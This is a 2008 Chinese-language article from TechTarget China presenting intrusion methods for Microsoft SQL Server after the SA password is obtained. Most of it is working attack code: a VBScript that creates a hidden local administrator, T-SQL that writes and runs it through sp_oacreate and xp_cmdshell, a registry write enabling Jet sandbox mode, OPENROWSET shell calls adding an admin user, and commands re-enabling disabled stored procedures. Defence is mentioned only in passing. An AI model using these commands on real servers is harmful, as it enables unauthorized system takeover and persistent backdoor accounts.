Microsoft SQL Server SA权限最新入侵方法

日期: 2008-07-10 作者:王岗 来源:TechTarget中国

  Microsoft SQL Server SA权限服务器一直是黑客青睐的对象,笔者也曾经发表过三篇相关的攻防文章(SA弱口令带来的安全隐患,Microsoft SQL Server SA弱口令攻防实战,SQL Server SA空口令的渗透测试日记),本文再向大家介绍几种入侵方法,读者可以根据情况找出防范办法。



  在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:






set wsnetwork=createObject(“WSCRIPT.NETWORK”)
os=”WinNT://”&wsnetwork.ComputerName
Set ob=GetObject(os) ’得到adsi接口,绑定
Set oe=GetObject(os&”/Administrators,group”) ’属性,admin组
Set od=ob.create(“user”,”test”) ’建立用户
od.SetPassword “1234” ’设置密码
od.SetInfo ’保存
Set of=GetObject(os&”/test”,user) ’得到用户
oe.add os&”/test”


  将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:






declare @o int, @f int, @t int, @ret int
&#101xec sp_oacreate ’scripting.filesystemobject’, @o out
&#101xec sp_oamethod @o, ’createtextfile’, @f out, ’c:1.vbs’, 1
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’set wsnetwork=createObject
(“WSCRIPT.NETWORK”)’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’os=”WinNT://”&wsnetwork.
ComputerName’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’Set ob=GetObject(os)’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’Set oe=GetObject
(os&”/Administrators,group”)’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’Set od=ob.create
(“user”,”test”)’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’od.SetPassword “1234”’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’od.SetInfo ’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’Set of=GetObject
(os&”/test”,user) ’
&#101xec @ret = sp_oamethod @f, ’writeline’, NULL,’oe.add os&”/test”’ 


  执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:1.vbs正被另一个程序运行”而无法成功添加用户:






&#101xec master..xp_cmdshell ’cscript c:1.vbs’


  如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:






&#101xec master..xp_cmdshell ’echo set wsnetwork=createObject(“WSCRIPT.NETWORK”)
>>1.vbs’


  不过,不知道为什么所有带“&”字符的命令行都无法写入1.vbs,感兴趣的朋友可以尝试解决一下。


  使用jet沙盘模式,可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式:






&#101xec master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0
Engines’,’SandBoxMode’,’REG_DWORD’,1


  然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户:






select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:windows
system32iasias.mdb’,’select shell(“cmd.exe /c net user test 1234 /add”)’)
select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:windows
system32iasias.mdb’,’select shell(“cmd.exe /c net localgroup 
administrators test /add”)’)


  不同的操作系统,路径也不一样,需要根据情况做修改:






NT/2K: c:winntsystem32 
XP/2003: c:windowssystem32


  另外Microsoft SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:






开启XP_cmdshell:
&#101xec sp_configure ’show advanced options’, 1;RECONFIGURE;&#101xec sp_configure
’xp_cmdshell’, 1;RECONFIGURE;
开启’OPENROWSET’:
&#101xec sp_configure ’show advanced options’, 1;RECONFIGURE;&#101xec sp_configure
’Ad Hoc Distributed Queries’,1;RECONFIGURE;
开启’sp_oacreate’:
&#101xec sp_configure ’show advanced options’, 1;RECONFIGURE;&#101xec sp_configure 
’Ole Automation Procedures’,1;RECONFIGURE;

我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。

我原创,你原创,我们的内容世界才会更加精彩!

【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】

微信公众号

TechTarget微信公众号二维码

TechTarget

官方微博

TechTarget中国官方微博二维码

TechTarget中国

电子邮件地址不会被公开。 必填项已用*标注

敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。

作者

王岗
王岗

相关推荐